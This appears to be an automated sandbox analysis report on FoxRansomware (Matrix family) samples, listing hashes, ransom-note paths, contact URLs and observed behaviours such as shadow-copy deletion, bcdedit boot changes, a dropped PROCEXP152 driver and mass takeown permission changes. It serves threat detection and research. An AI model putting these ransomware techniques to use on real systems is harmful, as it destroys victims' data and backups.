Overview
overview
10Static
static
3FoxRansomw...65.exe
windows7-x64
10FoxRansomw...65.exe
windows10-2004-x64
10FoxRansomw...a7.exe
windows7-x64
10FoxRansomw...a7.exe
windows10-2004-x64
10FoxRansomw...20.exe
windows7-x64
10FoxRansomw...20.exe
windows10-2004-x64
10FoxRansomw...0b.exe
windows7-x64
10FoxRansomw...0b.exe
windows10-2004-x64
10FoxRansomw...53.exe
windows7-x64
10FoxRansomw...53.exe
windows10-2004-x64
10FoxRansomw...b1.exe
windows7-x64
10FoxRansomw...b1.exe
windows10-2004-x64
10Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
13-02-2024 05:15
Static task
static1
Behavioral task
behavioral1
Sample
FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral3
Sample
FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Resource
win7-20231215-en
Behavioral task
behavioral4
Sample
FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral5
Sample
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Resource
win7-20231215-en
Behavioral task
behavioral6
Sample
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral7
Sample
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Resource
win7-20231215-en
Behavioral task
behavioral8
Sample
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral9
Sample
FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Resource
win7-20231215-en
Behavioral task
behavioral10
Sample
FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral11
Sample
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Resource
win7-20231215-en
Behavioral task
behavioral12
Sample
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Resource
win10v2004-20231215-en
General
-
Target
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
-
Size
1.2MB
-
MD5
268360527625d09e747d9f7ab1f84da5
-
SHA1
09772eb89c9743d3a6d7b2709c76e9740aa4c4b1
-
SHA256
42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620
-
SHA512
07fba0c06040fe4ef5f812a52d639bdea6cbe5bf7ff4560403ad12955e6b1ff2b4615361ac4533696a6c5e12d36fb2d2e0df3da2927f6b45f154f0a4e83315e1
-
SSDEEP
24576:mLeb4QFvTn5TuJR5ezGPMy4EnBB/CPVd+5M89H:Xb/GMO6d+5M+H
Malware Config
Extracted
http://myexternalip.com/raw
Extracted
C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.0\#FOX_README#.rtf
https://bitmsg.me
https://bitmsg.me/users/sign_up
https://bitmsg.me/users/sign_in
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
description ioc Process File created C:\Program Files\Java\jre-1.8\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\75BUQXOI\2\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\26310719480\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\UProof\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\ProgramData\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\vcRuntimeAdditional_x86\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk-1.8\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jre-1.8\lib\jfr\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\en-GB\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\es\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ca\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.XGpuEjectDialog_cw5n1h2txyewy\Settings\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\TempState\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\te\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\Settings\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Adobe\Color\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ha-Latn-NG\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\hr\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\mn\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\ne\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\az\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p6p4nphm.default-release\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\es\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Public\Videos\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\tr\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk-1.8\jre\legal\jdk\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk-1.8\lib\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\it\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jre-1.8\lib\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\Settings\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Google\Chrome\Application\106.0.5249.119\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Mozilla Firefox\defaults\pref\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\ProgramData\Microsoft\EdgeUpdate\Log\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\p6p4nphm.default-release\safebrowsing\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338389\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.NarratorQuickStart_8wekyb3d8bbwe\Settings\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk-1.8\jre\bin\server\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\en\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ka\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\ProgramData\Microsoft\IdentityCRL\INT\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files (x86)\Microsoft\Edge\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\el\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\ja\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\am-ET\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 6292 bcdedit.exe 5276 bcdedit.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 159 3132 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\Drivers\PROCEXP152.SYS fjPLyeD864.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" fjPLyeD864.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\International\Geo\Nation wscript.exe -
Executes dropped EXE 64 IoCs
pid Process 2968 NW76nE8i.exe 8000 fjPLyeD8.exe 6196 fjPLyeD864.exe 6776 fjPLyeD8.exe 6704 fjPLyeD8.exe 7544 fjPLyeD8.exe 7576 fjPLyeD8.exe 7608 fjPLyeD8.exe 7476 fjPLyeD8.exe 2196 cmd.exe 5704 fjPLyeD8.exe 5228 fjPLyeD8.exe 2068 fjPLyeD8.exe 7820 fjPLyeD8.exe 7580 fjPLyeD8.exe 5268 fjPLyeD8.exe 2924 fjPLyeD8.exe 5688 fjPLyeD8.exe 5468 fjPLyeD8.exe 6548 fjPLyeD8.exe 6076 Conhost.exe 3956 fjPLyeD8.exe 6644 fjPLyeD8.exe 6808 fjPLyeD8.exe 7692 fjPLyeD8.exe 6784 fjPLyeD8.exe 7556 fjPLyeD8.exe 6528 fjPLyeD8.exe 5624 fjPLyeD8.exe 2392 fjPLyeD8.exe 7464 cmd.exe 7728 fjPLyeD8.exe 3404 fjPLyeD8.exe 8056 fjPLyeD8.exe 7824 fjPLyeD8.exe 7580 fjPLyeD8.exe 7880 fjPLyeD8.exe 7448 fjPLyeD8.exe 8112 fjPLyeD8.exe 6948 fjPLyeD8.exe 7104 fjPLyeD8.exe 6580 fjPLyeD8.exe 7740 fjPLyeD8.exe 5712 fjPLyeD8.exe 5820 cmd.exe 5784 fjPLyeD8.exe 5096 fjPLyeD8.exe 792 fjPLyeD8.exe 5860 fjPLyeD8.exe 5900 fjPLyeD8.exe 4948 fjPLyeD8.exe 6112 fjPLyeD8.exe 6936 fjPLyeD8.exe 1848 fjPLyeD8.exe 4856 fjPLyeD8.exe 7752 fjPLyeD8.exe 6564 fjPLyeD8.exe 6364 fjPLyeD8.exe 6368 fjPLyeD8.exe 6560 fjPLyeD8.exe 5280 fjPLyeD8.exe 6304 fjPLyeD8.exe 5308 fjPLyeD8.exe 5240 fjPLyeD8.exe -
Modifies file permissions 1 TTPs 64 IoCs
pid Process 1584 takeown.exe 5048 Process not Found 4952 Process not Found 3052 takeown.exe 1948 takeown.exe 4028 takeown.exe 1660 takeown.exe 4428 Process not Found 3460 takeown.exe 2612 takeown.exe 7532 takeown.exe 6160 Process not Found 3016 takeown.exe 5176 takeown.exe 8132 takeown.exe 3624 Process not Found 5860 takeown.exe 7472 takeown.exe 7188 takeown.exe 5444 takeown.exe 7648 takeown.exe 7076 takeown.exe 1488 takeown.exe 5956 Process not Found 700 Process not Found 7232 takeown.exe 6912 takeown.exe 7464 takeown.exe 7568 takeown.exe 2804 takeown.exe 7936 Process not Found 1860 Process not Found 1300 takeown.exe 7880 takeown.exe 7788 takeown.exe 3620 takeown.exe 5088 Process not Found 6164 takeown.exe 7372 takeown.exe 5804 Process not Found 3484 Process not Found 5352 Process not Found 7988 takeown.exe 7844 Process not Found 6732 takeown.exe 6304 takeown.exe 1120 Process not Found 7136 takeown.exe 7644 takeown.exe 7136 takeown.exe 7472 Process not Found 6248 takeown.exe 6224 takeown.exe 6480 takeown.exe 4064 takeown.exe 7932 takeown.exe 3216 Process not Found 6600 takeown.exe 1388 takeown.exe 6180 takeown.exe 7188 takeown.exe 5904 takeown.exe 8152 takeown.exe 896 Process not Found -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral6/files/0x0006000000023211-2511.dat upx behavioral6/files/0x0006000000023211-2488.dat upx behavioral6/memory/8000-2545-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/6776-3887-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/6704-3889-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/6704-3890-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/7576-3968-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/7576-3969-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/7544-3966-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/7608-4849-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/7476-5011-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/2196-5764-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5704-5774-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5228-5805-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/8000-5852-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/2068-5871-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/7820-6315-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/7580-6339-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/7580-6340-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5268-6587-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/2924-6693-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5688-6697-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5468-6699-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/6548-6702-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/6076-6704-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/3956-6708-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/6644-6710-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/6808-6712-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/7692-6716-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/6784-6718-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/7556-6720-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/6528-6724-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5624-6726-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/2392-6728-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/7464-6730-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/7728-6734-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/3404-6736-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/8056-6738-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/7824-6740-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/7880-6744-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/7448-6748-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/files/0x0006000000023211-6749.dat upx behavioral6/memory/8112-6750-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/6948-6752-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/7104-6754-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/6580-6758-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/7740-6760-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/7580-6742-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5712-6764-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5820-6766-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5096-6774-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/792-6776-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5900-6780-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/4948-6782-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5860-6778-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/6936-6790-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/4856-6794-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/1848-6792-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/files/0x0006000000023211-6795.dat upx behavioral6/memory/7752-6796-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/6564-6797-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/6112-6788-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/6364-6801-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5784-6770-0x0000000000400000-0x0000000000477000-memory.dmp upx -
Drops desktop.ini file(s) 27 IoCs
description ioc Process File opened for modification C:\Users\Public\Music\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Libraries\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Links\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\3D Objects\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\AccountPictures\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Pictures\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Desktop\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Downloads\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Searches\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Videos\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Documents\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Music\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Videos\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Documents\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe -
Enumerates connected drives 3 TTPs 44 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
